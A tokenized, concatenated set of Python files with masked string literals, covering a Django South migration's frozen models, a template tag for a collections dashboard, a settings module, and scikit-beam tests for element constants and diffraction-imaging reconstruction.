'<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:code>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] <EOL> symmetrical = True </s>
<s> from django import template <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext as _ <EOL> register = template . Library ( ) <EOL> def user_collections_dashboard ( collections , user ) : <EOL> html = '<STR_LIT>' <EOL> for collection in collections : <EOL> is_default = collection . is_default_to_user ( user ) <EOL> classname = u'<STR_LIT>' if is_default else u'<STR_LIT>' <EOL> name = collection . name <EOL> edit_url = reverse ( '<STR_LIT>' , args = [ collection . pk ] ) <EOL> edit_label = _ ( '<STR_LIT>' ) <EOL> activation_label = _ ( '<STR_LIT>' ) <EOL> activation_url = reverse ( '<STR_LIT>' , <EOL> args = [ user . pk , collection . pk ] ) <EOL> if not is_default : <EOL> activation_snippet = u"""<STR_LIT>""" . format ( activation_url = activation_url , <EOL> activation_label = activation_label , <EOL> lowercase_name = name . lower ( ) ) . strip ( ) <EOL> else : <EOL> activation_snippet = u"""<STR_LIT>""" . format ( activation_url = activation_url , <EOL> activation_label = activation_label , <EOL> lowercase_name = name . lower ( ) ) . strip ( ) <EOL> if collection . is_managed_by_user ( user ) : <EOL> html_edit = u"""<STR_LIT>""" . format ( edit_url = edit_url , <EOL> edit_label = edit_label , <EOL> lowercase_name = name . lower ( ) <EOL> ) . strip ( ) <EOL> else : <EOL> html_edit = u"""<STR_LIT>""" . format ( edit_url = edit_url , <EOL> edit_label = edit_label , <EOL> lowercase_name = name . lower ( ) , <EOL> ) . strip ( ) <EOL> html_snippet = u"""<STR_LIT>""" . format ( classname = classname , <EOL> name = name , <EOL> activation_snippet = activation_snippet , <EOL> lowercase_name = name . lower ( ) , <EOL> html_edit = html_edit <EOL> ) . strip ( ) <EOL> html += html_snippet <EOL> return html <EOL> register . simple_tag ( user_collections_dashboard ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> PROJECT_PATH = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> execfile ( os . path . join ( PROJECT_PATH , '<STR_LIT>' ) ) <EOL> INSTALLED_APPS += ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> ALLOWED_HOSTS = [ '<STR_LIT:*>' ] <EOL> API_BALAIO_DEFAULT_TIMEOUT = <NUM_LIT:0> <EOL> JOURNAL_COVER_MAX_SIZE = <NUM_LIT:30> * <NUM_LIT> <EOL> JOURNAL_LOGO_MAX_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> EMAIL_HOST = '<STR_LIT:localhost>' <EOL> EMAIL_USE_TLS = False <EOL> EMAIL_PORT = <NUM_LIT> <EOL> EMAIL_HOST_USER = '<STR_LIT>' <EOL> EMAIL_HOST_PASSWORD = '<STR_LIT>' <EOL> DISABLE_LOGGING_BELOW_LEVEL = '<STR_LIT>' </s>
<s> from __future__ import absolute_import , division , print_function <EOL> import six <EOL> import numpy as np <EOL> from nose . tools import assert_equal <EOL> from skbeam . core . constants . basic import ( BasicElement , element , basic ) <EOL> def smoke_test_element_creation ( ) : <EOL> elements = sorted ( [ elm for abbrev , elm in six . iteritems ( basic ) <EOL> if isinstance ( abbrev , int ) ] ) <EOL> for e in elements : <EOL> sym = e . sym <EOL> name = e . name <EOL> inits = [ sym , sym . upper ( ) , sym . lower ( ) , sym . swapcase ( ) , name , <EOL> name . upper ( ) , name . lower ( ) , name . swapcase ( ) ] <EOL> for init in inits : <EOL> elem = BasicElement ( init ) <EOL> elem = BasicElement ( e . Z ) <EOL> str ( elem ) <EOL> for field in element . _fields : <EOL> tuple_attr = getattr ( basic [ e . Z ] , field ) <EOL> elem_attr_dct = elem [ str ( field ) ] <EOL> elem_attr = getattr ( elem , field ) <EOL> try : <EOL> if np . isnan ( tuple_attr ) : <EOL> continue <EOL> except TypeError : <EOL> pass <EOL> assert_equal ( elem_attr_dct , tuple_attr ) <EOL> assert_equal ( elem_attr , tuple_attr ) <EOL> assert_equal ( elem_attr_dct , elem_attr ) <EOL> for e1 , e2 in zip ( elements , elements [ <NUM_LIT:1> : ] ) : <EOL> assert_equal ( e1 . __lt__ ( e2 ) , True ) <EOL> assert_equal ( e1 < e2 , True ) <EOL> assert_equal ( e1 . __eq__ ( e2 ) , False ) <EOL> assert_equal ( e1 == e2 , False ) <EOL> assert_equal ( e1 >= e2 , False ) <EOL> assert_equal ( e1 > e2 , False ) <EOL> assert_equal ( e2 < e1 , False ) <EOL> assert_equal ( e2 . __lt__ ( e1 ) , False ) <EOL> assert_equal ( e2 <= e1 , False ) <EOL> assert_equal ( e2 . __eq__ ( e1 ) , False ) <EOL> assert_equal ( e2 == e1 , False ) <EOL> assert_equal ( e2 >= e1 , True ) <EOL> assert_equal ( e2 > e1 , True ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import nose <EOL> nose . runmodule ( argv = [ '<STR_LIT>' , '<STR_LIT>' ] , exit = False ) </s>
<s> from __future__ import absolute_import , division , print_function <EOL> import numpy as np <EOL> from numpy . testing import ( assert_equal , assert_array_equal , <EOL> assert_array_almost_equal , assert_almost_equal ) <EOL> from nose . tools import raises <EOL> from skbeam . core . cdi import ( _dist , gauss , find_support , <EOL> pi_modulus , cal_diff_error , cdi_recon , <EOL> generate_random_phase_field , <EOL> generate_box_support , generate_disk_support ) <EOL> def dist_temp ( dims ) : <EOL> """<STR_LIT>""" <EOL> new_array = np . zeros ( dims ) <EOL> if np . size ( dims ) == <NUM_LIT:2> : <EOL> x_sq = ( np . arange ( dims [ <NUM_LIT:0> ] ) - dims [ <NUM_LIT:0> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> y_sq = ( np . arange ( dims [ <NUM_LIT:1> ] ) - dims [ <NUM_LIT:1> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> for j in range ( dims [ <NUM_LIT:1> ] ) : <EOL> new_array [ : , j ] = np . sqrt ( x_sq + y_sq [ j ] ) <EOL> if np . size ( dims ) == <NUM_LIT:3> : <EOL> x_sq = ( np . arange ( dims [ <NUM_LIT:0> ] ) - dims [ <NUM_LIT:0> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> y_sq = ( np . arange ( dims [ <NUM_LIT:1> ] ) - dims [ <NUM_LIT:1> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> z_sq = ( np . arange ( dims [ <NUM_LIT:2> ] ) - dims [ <NUM_LIT:2> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> for j in range ( dims [ <NUM_LIT:1> ] ) : <EOL> for k in range ( dims [ <NUM_LIT:2> ] ) : <EOL> new_array [ : , j , k ] = np . sqrt ( x_sq + y_sq [ j ] + z_sq [ k ] ) <EOL> return new_array <EOL> def test_dist ( ) : <EOL> shape2D = [ <NUM_LIT> , <NUM_LIT:100> ] <EOL> data = _dist ( shape2D ) <EOL> data1 = dist_temp ( shape2D ) <EOL> assert_array_equal ( data . shape , shape2D ) <EOL> assert_array_equal ( data , data1 ) <EOL> shape3D = [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] <EOL> data = _dist ( shape3D ) <EOL> data1 = dist_temp ( shape3D ) <EOL> assert_array_equal ( data . shape , shape3D ) <EOL> assert_array_equal ( data , data1 ) <EOL> def test_gauss ( ) : <EOL> shape2D = ( <NUM_LIT:100> , <NUM_LIT:100> ) <EOL> shape3D = ( <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT:50> ) <EOL> shape_list = [ shape2D , shape3D ] <EOL> std = <NUM_LIT:10> <EOL> for v in shape_list : <EOL> d = gauss ( v , std ) <EOL> assert_almost_equal ( <NUM_LIT:0> , np . mean ( d ) , decimal = <NUM_LIT:3> ) <EOL> def test_find_support ( ) : <EOL> shape_v = [ <NUM_LIT:100> , <NUM_LIT:100> ] <EOL> cenv = shape_v [ <NUM_LIT:0> ] / <NUM_LIT:2> <EOL> r = <NUM_LIT:20> <EOL> a = np . zeros ( shape_v ) <EOL> a [ cenv - r : cenv + r , cenv - r : cenv + r ] = <NUM_LIT:1.0> <EOL> sw_sigma = <NUM_LIT> <EOL> sw_threshold = <NUM_LIT> <EOL> new_sup_index = find_support ( a , sw_sigma , sw_threshold ) <EOL> new_sup = np . zeros_like ( a ) <EOL> new_sup [ new_sup_index ] = <NUM_LIT:1> <EOL> assert ( np . sum ( new_sup ) == <NUM_LIT> ) <EOL> def make_synthetic_data ( ) : <EOL> """<STR_LIT>""" <EOL> shapev = [ <NUM_LIT:100> , <NUM_LIT:100> ] <EOL> r = <NUM_LIT:20> <EOL> a = np . zeros ( shapev ) <EOL> a [ shapev [ <NUM_LIT:0> ] // <NUM_LIT:2> - r : shapev [ <NUM_LIT:0> ] // <NUM_LIT:2> + r , shapev [ <NUM_LIT:1> ] // <NUM_LIT:2> - r : shapev [ <NUM_LIT:1> ] // <NUM_LIT:2> + r ] = <NUM_LIT:1> <EOL> diff_v = np . abs ( np . fft . fftn ( a ) ) / np . sqrt ( np . size ( a ) ) <EOL> return a , diff_v <EOL> def test_pi_modulus ( ) : <EOL> a , diff_v = make_synthetic_data ( ) <EOL> a_new = pi_modulus ( a , diff_v ) <EOL> assert_array_almost_equal ( np . abs ( a_new ) , a ) <EOL> def test_cal_diff_error ( ) : <EOL> a , diff_v = make_synthetic_data ( ) <EOL> result = cal_diff_error ( a , diff_v ) <EOL> assert_equal ( np . sum ( result ) , <NUM_LIT:0> ) <EOL> def cal_support ( func ) : <EOL> def inner ( * args ) : <EOL> return func ( * args ) <EOL> return inner <EOL> def _box_support_area ( sup_radius , shape_v ) : <EOL> sup = generate_box_support ( sup_radius , shape_v ) <EOL> new_sup = sup [ sup != <NUM_LIT:0> ] <EOL> assert_array_equal ( new_sup . shape , ( <NUM_LIT:2> * sup_radius ) ** len ( shape_v ) ) <EOL> def _disk_support_area ( sup_radius , shape_v ) : <EOL> sup = generate_disk_support ( sup_radius , shape_v ) <EOL> new_sup = sup [ sup != <NUM_LIT:0> ] <EOL> assert ( new_sup . size < ( <NUM_LIT:2> * sup_radius ) ** len ( shape_v ) ) <EOL> def test_support ( ) : <EOL> sup_radius = <NUM_LIT:20> <EOL> a , diff_v = make_synthetic_data ( ) <EOL> shape_list = [ [ <NUM_LIT:100> , <NUM_LIT:100> ] , [ <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> ] ] <EOL> for v in shape_list : <EOL> yield _box_support_area , sup_radius , v <EOL> for v in shape_list : <EOL> yield _disk_support_area , sup_radius , v <EOL> def test_recon ( ) : <EOL> a , diff_v = make_synthetic_data ( ) <EOL> total_n = <NUM_LIT:10> <EOL> sup_radius = <NUM_LIT:20> <EOL> init_phase = generate_random_phase_field ( diff_v ) <EOL> sup = generate_box_support ( sup_radius , diff_v . shape ) <EOL> outv1 , error_dict = cdi_recon ( diff_v , init_phase , sup , sw_flag = False , <EOL> n_iterations = total_n , sw_step = <NUM_LIT:2> ) <EOL> outv1 = np . abs ( outv1 ) <EOL> outv2 , error_dict = cdi_recon ( diff_v , init_phase , sup , <EOL> pi_modulus_flag = '<STR_LIT>' , sw_flag = True , <EOL> n_iterations = total_n , sw_step = <NUM_LIT:2> ) <EOL> outv2 = np . abs ( outv2 ) <EOL> assert_array_equal ( outv1 . shape , outv2 . shape ) <EOL> @ raises ( TypeError ) <EOL> def test_cdi_plotter ( ) : <EOL> a , diff_v = make_synthetic_data ( ) <EOL> total_n = <NUM_LIT:10> <EOL> sup_radius = <NUM_LIT:20> <EOL> init_phase = generate_random_phase_field ( diff_v ) <EOL> sup = generate_box_support ( sup_radius , diff_v . shape ) <EOL> outv , error_d = cdi_recon ( diff_v , init_phase , sup , sw_flag = True , <EOL> n_iterations = total_n , sw_step = <NUM_LIT:2> , cb_function = <NUM_LIT:10> ) </s>
<s> from __future__ import absolute_import , division , print_function <EOL> import os <EOL> import importlib <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> filetypes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> blacklisted = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class ValuesError ( ValueError ) : <EOL> pass <EOL> class UnwelcomenessError ( ValuesError ) : <EOL> pass <EOL> def _everybody_welcome_here ( string_to_check , blacklisted = blacklisted ) : <EOL> for line in string_to_check . split ( '<STR_LIT:\n>' ) : <EOL> for b in blacklisted : <EOL> if b in string_to_check : <EOL> raise UnwelcomenessError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:%s>" % ( string_to_check , b , blacklisted ) <EOL> ) <EOL> def _openess_tester ( module ) : <EOL> if hasattr ( module , '<STR_LIT>' ) : <EOL> funcs = module . __all__ <EOL> else : <EOL> funcs = dir ( module ) <EOL> for f in funcs : <EOL> yield _everybody_welcome_here , f . __doc__ <EOL> def test_openness ( ) : <EOL> """<STR_LIT>""" <EOL> starting_package = '<STR_LIT>' <EOL> modules , files = get_modules_in_library ( starting_package ) <EOL> for m in modules : <EOL> yield _openess_tester , importlib . import_module ( m ) <EOL> for afile in files : <EOL> with open ( afile , '<STR_LIT:r>' ) as f : <EOL> yield _everybody_welcome_here , f . read ( ) <EOL> _IGNORE_FILE_EXT = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> _IGNORE_DIRS = [ '<STR_LIT>' , '<STR_LIT>' , 